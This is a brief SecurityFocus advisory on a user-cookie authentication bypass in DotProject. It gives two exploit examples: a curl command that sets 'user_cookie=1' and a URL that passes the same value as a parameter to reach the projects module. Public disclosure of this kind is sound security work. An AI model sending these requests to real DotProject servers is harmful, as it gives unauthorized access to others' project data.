DotProject User Cookie Authentication Bypass Vulnerability

This issue may be exploited with a web browser. The following examples were submitted:

curl -b user_cookie=1 http://server/project/index.php?m=projects

or

http://server/project/index.php?m=projects&user_cookie=1


 

Privacy Statement
Copyright 2010, SecurityFocus